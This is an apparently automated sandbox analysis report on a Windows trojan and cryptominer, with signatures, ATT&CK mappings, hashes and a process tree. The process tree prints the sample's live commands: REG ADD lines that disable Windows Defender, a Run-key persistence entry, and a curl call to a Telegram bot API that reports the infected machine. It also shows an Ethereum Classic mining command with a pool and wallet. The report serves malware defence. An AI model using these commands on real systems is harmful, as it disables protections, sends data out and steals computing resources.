1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe

Analysis

max time kernel
122s
max time network
144s
platform
windows7_x64
resource
win7-en-20211208
submitted
12-02-2022 11:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe
Size

119KB
MD5

66294a0b8c3ebd0377785a2e7fad8d9d
SHA1

36034abc756afd2d7b2c8e7c0d43f4a515ed3884
SHA256

1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe
SHA512

8ab5a573809e230edb7ea1e8a763f0cbca8cd4a4abacb1cc909999bc81034bb26a3c3e01a6244649e458eadc673651f6cc0bd952ee476d90557b7b559337409e

Score

10^/10

evasion persistence themida trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

7z.exe7z.exeRegHost.exe

pid process

1716 7z.exe
1756 7z.exe
1724 RegHost.exe

pid	process
1716	7z.exe
1756	7z.exe
1724	RegHost.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx
\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

bfsvc.exeexplorer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bfsvc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bfsvc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorer.exe

Loads dropped DLL 6 IoCs

Processes:

cmd.exe7z.execmd.exe7z.exeexplorer.exe

pid process

1120 cmd.exe
1716 7z.exe
2028 cmd.exe
1756 7z.exe
1624 explorer.exe
1624 explorer.exe

pid	process
1120	cmd.exe
1716	7z.exe
2028	cmd.exe
1756	7z.exe
1624	explorer.exe
1624	explorer.exe

Themida packer 20 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe	themida
behavioral1/memory/1624-83-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-84-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-85-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-95-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-96-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-97-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-98-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-99-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-90-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-100-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-101-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-108-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-107-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-106-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-104-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-105-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-109-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-102-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1624-103-0x0000000140000000-0x00000001402AD000-memory.dmp	themida

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

bfsvc.exe

pid process

1712 bfsvc.exe
1712 bfsvc.exe

pid	process
1712	bfsvc.exe
1712	bfsvc.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe

description	pid	process	target process
PID 1792 set thread context of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 set thread context of 1624	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	explorer.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

explorer.exe

pid process

1624 explorer.exe
1624 explorer.exe
1624 explorer.exe
1624 explorer.exe
1624 explorer.exe

pid	process
1624	explorer.exe
1624	explorer.exe
1624	explorer.exe
1624	explorer.exe
1624	explorer.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

7z.exe7z.exe

description	pid	process
Token: SeRestorePrivilege	1716	7z.exe
Token: 35	1716	7z.exe
Token: SeSecurityPrivilege	1716	7z.exe
Token: SeSecurityPrivilege	1716	7z.exe
Token: SeRestorePrivilege	1756	7z.exe
Token: 35	1756	7z.exe
Token: SeSecurityPrivilege	1756	7z.exe
Token: SeSecurityPrivilege	1756	7z.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1792 wrote to memory of 520	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 520	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 520	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 520 wrote to memory of 540	520	cmd.exe	reg.exe
PID 520 wrote to memory of 540	520	cmd.exe	reg.exe
PID 520 wrote to memory of 540	520	cmd.exe	reg.exe
PID 1792 wrote to memory of 544	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 544	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 544	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 544 wrote to memory of 916	544	cmd.exe	reg.exe
PID 544 wrote to memory of 916	544	cmd.exe	reg.exe
PID 544 wrote to memory of 916	544	cmd.exe	reg.exe
PID 1792 wrote to memory of 1124	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 1124	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 1124	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1124 wrote to memory of 1524	1124	cmd.exe	reg.exe
PID 1124 wrote to memory of 1524	1124	cmd.exe	reg.exe
PID 1124 wrote to memory of 1524	1124	cmd.exe	reg.exe
PID 1792 wrote to memory of 832	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 832	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 832	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 832 wrote to memory of 1544	832	cmd.exe	reg.exe
PID 832 wrote to memory of 1544	832	cmd.exe	reg.exe
PID 832 wrote to memory of 1544	832	cmd.exe	reg.exe
PID 1792 wrote to memory of 740	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 740	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 740	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 740 wrote to memory of 292	740	cmd.exe	reg.exe
PID 740 wrote to memory of 292	740	cmd.exe	reg.exe
PID 740 wrote to memory of 292	740	cmd.exe	reg.exe
PID 1792 wrote to memory of 800	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 800	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 800	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 1832	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 1832	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 1832	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1832 wrote to memory of 1108	1832	cmd.exe	reg.exe
PID 1832 wrote to memory of 1108	1832	cmd.exe	reg.exe
PID 1832 wrote to memory of 1108	1832	cmd.exe	reg.exe
PID 1792 wrote to memory of 1120	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 1120	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 1120	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1120 wrote to memory of 1716	1120	cmd.exe	7z.exe
PID 1120 wrote to memory of 1716	1120	cmd.exe	7z.exe
PID 1120 wrote to memory of 1716	1120	cmd.exe	7z.exe
PID 1792 wrote to memory of 2028	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 2028	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 1792 wrote to memory of 2028	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	cmd.exe
PID 2028 wrote to memory of 1756	2028	cmd.exe	7z.exe
PID 2028 wrote to memory of 1756	2028	cmd.exe	7z.exe
PID 2028 wrote to memory of 1756	2028	cmd.exe	7z.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe
PID 1792 wrote to memory of 1712	1792	1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe	bfsvc.exe

C:\Users\Admin\AppData\Local\Temp\1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe
"C:\Users\Admin\AppData\Local\Temp\1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe"
1⤵
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v DisableAntiSpyware /t REG_DWORD /d 1
2⤵
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v DisableAntiSpyware /t REG_DWORD /d 1
3⤵
PID:540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
2⤵
- Suspicious use of WriteProcessMemory
PID:544

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
3⤵
PID:916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableBehaviorMonitoring /t REG_DWORD /d 1
2⤵
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableBehaviorMonitoring /t REG_DWORD /d 1
3⤵
PID:1524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableOnAccessProtection /t REG_DWORD /d 1
2⤵
- Suspicious use of WriteProcessMemory
PID:832

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableOnAccessProtection /t REG_DWORD /d 1
3⤵
PID:1544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1
2⤵
- Suspicious use of WriteProcessMemory
PID:740

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1
3⤵
PID:292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot1765686682:AAFKW2CipVCRG2oYuHNFJMKO8RSC06ZylW8/sendMessage?chat_id=-679243704&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Standard VGA Graphics Adapter%0A(Windows%20Defender%20has%20been%20turned%20off)"
2⤵
PID:800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
2⤵
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
3⤵
- Adds Run key to start application
PID:1108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1120

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2028

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 966238e0d3C22B90435D92a6f01665fbf8a92a3A -coin etc -worker @EasyMiner_Bot -tt 85 -tmax 85 -clKernel 3 -mi 14
2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1712

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 966238e0d3C22B90435D92a6f01665fbf8a92a3A -coin etc -worker @EasyMiner_Bot -tt 85 -tmax 85 -clKernel 3 -mi 14
2⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1624

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
3⤵
- Executes dropped EXE
PID:1724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v DisableAntiSpyware /t REG_DWORD /d 1
4⤵
PID:1772

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v DisableAntiSpyware /t REG_DWORD /d 1
5⤵
PID:804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
4⤵
PID:1716

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
5⤵
PID:1752

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

